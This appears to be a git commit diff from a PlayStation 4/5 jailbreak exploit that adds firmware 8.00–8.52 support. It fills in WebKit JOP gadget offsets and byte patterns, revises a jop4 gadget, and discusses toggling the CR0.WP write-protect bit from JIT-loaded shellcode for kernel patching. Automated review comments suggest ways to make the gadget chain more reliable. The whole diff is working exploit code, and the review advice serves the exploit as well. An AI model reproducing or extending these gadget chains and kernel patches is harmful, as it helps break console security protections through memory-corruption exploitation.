8.00-8.52 are now supported

Al Azif
2025-06-03 17:01:27 -07:00
parent bcbca6a727
commit a74538dee4
6 changed files with 15 additions and 12 deletions


@@ -64,6 +64,8 @@ const [is_ps4, version] = (() => {
throw RangeError(`invalid config.target: ${hex(value)}`);
}
log(`Console: PS${is_ps4 ? "4" : "5"} | Firmware: ${hex(version)}`);
return [is_ps4, version];
})();
@@ -1491,8 +1493,8 @@ async function get_binary(url) {
}
// Using JIT to load our own shellcode code here avoids the need to preform
// some trick toggle the CR0 Protection Mode bit. We can just toggle it easily
// within our shellcode.
// some trick toggle the CR0.WP bit. We can just toggle it easily within our
// shellcode.
async function patch_kernel(kbase, kmem, p_ucred, restore_info) {
if (!is_ps4) {
throw RangeError("ps5 kernel patching unsupported");
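Review bot: The rewritten comment line `// some trick toggle the CR0.WP bit. We can just toggle it easily within our` is still ungrammatical ("some trick toggle" is missing a "to"), and the unchanged line above it carries "shellcode code" and "preform". Since the commit already touches this sentence, it could fix it in one go: `// Using JIT to load our own shellcode here avoids the need to perform` / `// some trick to toggle the CR0.WP bit. We can just toggle it easily within our` / `// shellcode.`. The naming of the bit as CR0.WP is the correct one for a write-protect bypass, so that part of the change reads fine. The patch_kernel function whose header follows this comment continues outside the hunk, and the two lines added by the first hunk of this file cannot be told apart from context on the rendered page.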


@@ -60,6 +60,8 @@ const [is_ps4, version] = (() => {
throw RangeError(`invalid config.target: ${hex(value)}`);
}
log(`Console: PS${is_ps4 ? "4" : "5"} | Firmware: ${hex(version)}`);
return [is_ps4, version];
})();


@@ -61,7 +61,6 @@ call qword ptr [rax + 0x40]
`;
const jop4 = `
push rdx
mov edi, 0xac9784fe
jmp qword ptr [rax]
`;
const jop5 = "pop rsp; ret";
@@ -112,7 +111,7 @@ const webkit_gadget_offsets = new Map(
[jop1]: 0x0000000001988320, // `48 8b 7e 08 48 8b 07 ff 60 70`
[jop2]: 0x000000000076b970, // `55 48 89 e5 48 8b 07 ff 50 30`
[jop3]: 0x0000000000f62f95, // `48 8b 52 50 b9 0a 00 00 00 ff 50 40`
[jop4]: 0x00000000021af6ad, // `52 bf fe 84 97 ac ff 20`
[jop4]: 0x0000000001ef0d16, // `52 ff 20`
[jop5]: 0x00000000000bf669, // `5c c3`
}),
);
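Review bot: The new jop4 entry `[jop4]: 0x0000000001ef0d16, // \`52 ff 20\`` records its expected bytes only in a comment, so an offset that is wrong for a given firmware build is discovered only when the JOP chain jumps into unrelated code, which on the console is a crash rather than a reportable error. Every entry in webkit_gadget_offsets already carries its byte pattern, so the pattern could be stored next to the offset (or the comment turned into data) and the chain setup could read the bytes at the gadget address and compare them before the chain is triggered, throwing a descriptive Error on mismatch; if such a verification step already exists elsewhere in the file, a one-line comment here pointing to it would be enough. The shortened jop4 template (`push rdx` then `jmp qword ptr [rax]`) is consistent with the `52 ff 20` bytes, so the asm/offset pair itself looks coherent. The jop3 template that the first hunk header cuts through, and the Map constructor around the offset table, both start outside the hunks.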


@@ -37,7 +37,7 @@ export let libkernel_base = null;
// libSceLibcInternal.sprx
export let libc_base = null;
// TODO: gadgets for the JOP chain
// gadgets for the JOP chain
//
// we'll use JSC::CustomGetterSetter.m_setter to redirect execution. its
// type is PutPropertySlot::PutValueFunc
@@ -61,7 +61,6 @@ call qword ptr [rax + 0x40]
`;
const jop4 = `
push rdx
mov edi, 0xac9784fe
jmp qword ptr [rax]
`;
const jop5 = "pop rsp; ret";
@@ -109,11 +108,11 @@ const webkit_gadget_offsets = new Map(
"mov dword ptr [rdi], eax; ret": 0x0000000000008e7f, // `89 07 c3`
"mov dword ptr [rax], esi; ret": 0x0000000000cf6c22, // `89 30 c3`
[jop1]: 0x0000000000000000, // ``
[jop2]: 0x0000000000000000, // ``
[jop3]: 0x0000000000000000, // ``
[jop4]: 0x0000000000000000, // ``
[jop5]: 0x0000000000000000, // ``
[jop1]: 0x00000000019881d0, // `48 8b 7e 08 48 8b 07 ff 60 70`
[jop2]: 0x00000000011c9df0, // `55 48 89 e5 48 8b 07 ff 50 30`
[jop3]: 0x000000000126c9c5, // `48 8b 52 50 b9 0a 00 00 00 ff 50 40`
[jop4]: 0x00000000021f3a2e, // `52 ff 20`
[jop5]: 0x0000000000073c2b, // `5c c3`
}),
);
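Review bot: Nothing guards against an unfilled gadget entry: before this commit the five jop offsets in this table were `0x0000000000000000` with empty byte comments, and zero is an accepted value that would silently make the chain jump to the WebKit base, so a fail-fast check after the table such as `for (const [name, off] of webkit_gadget_offsets) { if (off === 0) throw new Error(\`missing gadget offset: ${name}\`); }` would turn the next half-populated firmware table into an immediate error. As a point of style, the jop1–jop5 template strings are edited here identically to the previous file section and do not vary by firmware, only the offsets do; keeping the templates in one shared module and leaving only the per-firmware Map in each file would make a firmware addition a pure table change and avoid the two copies drifting. The `new Map(` constructor enclosing the offsets starts before the hunk.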